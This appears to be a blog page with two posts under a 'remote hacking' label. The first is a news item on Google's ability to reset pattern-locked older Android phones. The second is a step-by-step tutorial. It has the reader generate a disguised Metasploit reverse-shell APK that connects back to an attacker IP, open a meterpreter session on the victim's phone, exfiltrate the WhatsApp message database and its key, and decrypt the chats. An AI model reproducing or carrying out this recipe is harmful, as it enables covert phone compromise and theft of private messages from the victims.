Showing posts with label remote hacking. Show all posts

Friday, November 27, 2015

Here's How Google Can "Remotely Bypass" Pattern Lock Of Android Device



Older versions of Android can be remotely reset by Google if the company is issued with a court order, but only if they're locked using a pattern. 

This is according to a document prepared by the New York District Attorney's Office which revealed just how easily investigators could see the contents of a device.

Devices running Android 5.0 and newer cannot be remotely reset as they use full disk encryption.

However, this option is not switched on by default.

The report found any device using an older version of the operating system is vulnerable to remote reset and according to the Android Developer Dashboard, this is 74.1 per cent of Android devices currently being used.

However, this figure is slightly misleading. 

The remote reset feature does apply to phones running operating systems before Android L, but it only applies to people who have secured their device with a pattern.

Google can't remotely reset phones secured with a PIN or passcode, meaning the number of affected devices could be lower.  

A post from Google's Adrian Ludwig attempted to clarify the situation.
He said: 'Google has no ability to facilitate unlocking any device that has been protected with a PIN, Password, or fingerprint. 

'This is the case whether or not the device is encrypted, and for all versions of Android.

'Google also does not have any mechanism to facilitate access to devices that have been encrypted (whether encrypted by the user, as has been available since Android 3.0 for all Android devices, or encrypted by default, as has been available since Android 5.0 on select devices).

'There are some devices that have been configured to use a "pattern" to unlock. Until Android L, "pattern" unlock did provide a recovery option with the Google account.

'This recovery feature was discontinued with Android L.

'Also, the lost pattern recovery feature never applied to PIN or Password so if you are on an earlier model device and don't want to use the pattern recovery feature, you can switch to a PIN or Password and it will be disabled.' 

However, the report insists that forensic examiners are able to bypass passcodes on devices using a 'variety of forensic techniques.'

Monday, October 5, 2015

How To Remotely Decrypt The Whatsapp Database "crypt8"

Before starting the database decryption process, first obtain remote access to the Android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ LHOST = attacker IP address, LPORT = local port ]
This command will generate fake.apk in the home directory.

2. Type: msfconsole
This command will start the Metasploit Framework.

3. Type: use exploit/multi/handler
This is used in order to get multiple sessions on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from the victim's device to the attacker's computer.

5. Type: show options
It will show the available options, such as LHOST and LPORT.

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT


Now run the app created in step 1 on your Android phone and you'll get a meterpreter session.

After getting the meterpreter session, type the commands below to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (lists the contents of the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded; now we need the key to decrypt it.
Follow the commands below to obtain the key for the databases:
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(This copies the file 'key' to the sdcard > Download folder.)

After obtaining the databases and key, download the simple GitHub tool to decrypt the databases:
  • Open the application (in Windows).
  • Click 'File', then 'Decrypt .crypt8'.
  • In the box, provide the Key file and Database.
  • Click OK; you will see that a 'msgstore.decrypted' file has appeared on your desktop.

  • Open it using the same application: go to 'File', then 'Open'.
  • Provide the decrypted file generated on the desktop, and leave the Account name and the 'wa.db' fields blank.
  • Click 'OK'.
  • Now you will see the contact numbers with the chat details.
Note: A rooted smartphone is required to obtain the database and key from the smartphone.